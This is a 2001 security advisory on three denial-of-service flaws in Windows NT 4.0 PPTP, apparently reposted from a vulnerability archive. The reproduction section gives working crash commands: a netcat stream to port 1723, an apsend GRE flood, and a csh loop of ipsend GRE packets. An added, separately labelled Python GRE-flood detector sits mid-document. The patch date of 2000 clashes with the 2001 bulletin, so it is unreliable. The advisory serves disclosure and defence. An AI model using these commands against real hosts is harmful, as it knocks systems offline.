SECURITYVULNS:DOC:1313
Feb 23, 2001 - 12:00 a.m.

Denial of Service attack against computers running Microsoft PPTP (NT 4.0)

2001-02-23 00:00:00
vulners.com

Diversified Software Industries, Inc.
http://www.dsi-inc.net/dsi
Security Advisory

February 22, 2001

Denial of Service attack against computers running Microsoft PPTP (NT 4.0)

  1. Description
  2. Steps to reproduce (exploits)
  3. Vendor status, solution, workarounds
  4. Disclaimer
  5. Credits
  6. About DSI

  1. Description

PPTP (Point-to-Point Tunneling Protocol) is a networking technology that is
used to create VPNs. The protocol uses TCP (port 1723) and GRE to perform
its work. PPTP is specified in RFC 2637 (see
http://www.ietf.org/rfc/rfc2637.txt).

This advisory presents three separate vulnerabilities. All three
vulnerabilities affect Windows NT 4.0 Workstation and Server computers
configured to accept incoming PPTP connections. The first vulnerability
involves malformed TCP packets; this vulnerability only affects certain
hardware, and only affects systems pre-SP6. The second and third
vulnerabilities involve malformed GRE packets; these affect computers with
any Service Pack.

Note that Microsoft's original bulletin did not list NT 4.0 Workstation as
vulnerable. However, if configured to accept incoming PPTP connections, NT
Workstation is vulnerable. No versions of Windows 2000 are believed
vulnerable.


  2. Steps to reproduce (exploits)

Tools needed:
Unix box (e.g., Linux, *BSD)
netcat (http://www.l0pht.com/~weld/netcat/ or
http://www.securityfocus.com/tools/137)
apsend (http://www.elxsi.de/ or http://www.securityfocus.com/tools/976)
ipsend (http://coombs.anu.edu.au/%7Eavalon/ or
http://www.securityfocus.com/tools/129)

Vulnerability 1: TCP Port 1723

This vulnerability only applies to machines prior to SP6. Not all machines
are affected; it appears there may be some BIOS or other issue at work here.
To reproduce, enter the following on the Unix box:

nc <ip address> 1723 < /dev/zero

If vulnerable, the target host will blue screen in a few seconds with an
error such as:
STOP 0x0A (0x0, 0x2, 0x0, 0x0)
IRQL_NOT_LESS_OR_EQUAL

Again, this vulnerability is machine-dependent; a list of tested hardware
and results can be found in the online version of this advisory at
http://www.dsi-inc.net/dsi/pptp_security_report.shtml

Vulnerability 2: GRE

This vulnerability applies to all service packs. To reproduce, on the
target machine, open task manager and select the performance tab. Also,
open a DOS window (Start: Run: cmd). On the Unix box:

apsend -d <ip address> --protocol 47 -m 0 -q

On the target host, you will see the numbers for kernel memory slowly rise
in task manager. Eventually, these numbers will stop increasing; at this
point, CPU may hit 100% for some period of time. Now try issuing a command
such as DIR at the command prompt; you'll see a message indicating the OS
isn't able to complete the command. Also, you may find the following in
your System event log:

Event ID: 2000 "The server's call to a system service failed unexpectedly."
and/or
Event ID: 2019 "The server was unable to allocate from the system nonpaged
pool because the pool was empty."

Eventually, the target host may reboot/blue screen, or it may simply remain
in an unusable state. As noted by Microsoft in their description of the
issue, a large number of packets is required. For a server with 64 MB RAM
installed, something on the order of 350,000 to 400,000 packets is needed.
Note that the effect is cumulative; e.g., an attacker could send 200,000
packets at 10 A.M. and 200,000 at 2 P.M.

Vulnerability 3: GRE

This vulnerability also applies to all service packs. To reproduce, on the
Unix box:

#!/bin/csh
foo:
ipsend -i <interface> -P gre <ip address> > /dev/null
goto foo

The target host will blue screen quickly. Approximately 50 packets are
required.


  3. Vendor status, solution, workarounds

Microsoft released a patch on February 13, 2000. Microsoft's bulletin is
available at http://www.microsoft.com/technet/security/bulletin/MS01-009.asp

As a workaround, it is possible to filter GRE by source address at your
perimeter. However, since GRE is a connectionless protocol, source address
spoofing is trivial. Thus, if an attacker can guess what source addresses
are allowed, filtering may not be effective.
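The following is an added example, not part of the DSI advisory: a small Python check a perimeter sensor could run against the GRE floods described under Vulnerabilities 2 and 3. It parses raw IPv4 headers, keeps cumulative per-source GRE counts (because the nonpaged-pool effect is cumulative), and also totals GRE packets per destination, since the spoofing caveat above means per-source filtering alone can be bypassed. The peer list, threshold and sample packets are all constructed assumptions.

```python
"""Added example (not from the DSI advisory): count GRE (IP protocol 47) packets
per source and per destination from raw IPv4 headers. Per-source counts are
cumulative because the nonpaged-pool exhaustion is cumulative; per-destination
totals catch floods whose source addresses are spoofed. Sample data is constructed."""
import struct
from collections import Counter

GRE_PROTO = 47  # IP protocol number for GRE (the PPTP data channel)

def parse_ipv4(pkt):
    """Return (src, dst, proto) from a raw IPv4 header, or None if malformed."""
    if len(pkt) < 20:
        return None
    f = struct.unpack("!BBHHHBBH4s4s", pkt[:20])
    if f[0] >> 4 != 4 or (f[0] & 0x0F) < 5:   # version 4, IHL >= 5 words
        return None
    return ".".join(map(str, f[8])), ".".join(map(str, f[9])), f[6]

def make_ipv4(src, dst, proto):
    """Build a minimal IPv4 header (no options, checksum zeroed) for test data."""
    addr = lambda a: bytes(int(x) for x in a.split("."))
    return struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20, 0, 0, 64, proto, 0,
                       addr(src), addr(dst))

def gre_report(packets, allowed_peers, threshold):
    """Return (per-source counts, per-destination totals, alert strings)."""
    by_src, by_dst = Counter(), Counter()
    for pkt in packets:
        parsed = parse_ipv4(pkt)
        if parsed is None or parsed[2] != GRE_PROTO:
            continue
        by_src[parsed[0]] += 1
        by_dst[parsed[1]] += 1
    alerts = [f"GRE from non-peer {s}: {n} packets"
              for s, n in by_src.items() if s not in allowed_peers]
    alerts += [f"GRE volume to {d} reached {n} (threshold {threshold})"
               for d, n in by_dst.items() if n >= threshold]
    return by_src, by_dst, alerts

# Constructed sample: 3 GRE packets from a known peer, 5 from an unknown host,
# and one TCP packet (protocol 6) that must be ignored.
SAMPLE = ([make_ipv4("192.0.2.10", "198.51.100.5", GRE_PROTO)] * 3
          + [make_ipv4("203.0.113.7", "198.51.100.5", GRE_PROTO)] * 5
          + [make_ipv4("192.0.2.10", "198.51.100.5", 6)])

if __name__ == "__main__":
    for line in gre_report(SAMPLE, {"192.0.2.10"}, 8)[2]:
        print(line)
```

In production the threshold would be set from the packet counts the advisory gives for the target's memory size, and the per-destination total is the figure to watch when sources are spoofed.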


  4. Disclaimer

The information in this advisory is believed to be accurate. No warranty is
given, express or implied. Neither the author nor the publisher accepts any
liability whatsoever for any use of this information, nor do we condone the
use of this information for unethical purposes.


  5. Credits

Microsoft, for their efforts to fix this problem
Chris Manjoine of the University of Iowa, for his help testing the exploits
Hobbit, Anarchy, and Darren Reed, for their useful tools


  6. About DSI

Diversified Software Industries, Inc. is an Iowa City/Coralville, Iowa-based
company that develops and markets software for the graphical representation
of data in vehicles. In addition, DSI markets custom software development
and project management skills to firms in the over-the-road transportation
marketplace. These custom solutions provide back office and on-vehicle
wireless messaging management, as well as dispatching and resource tracking
systems.

You can find more information about DSI at http://www.dsi-inc.net/dsi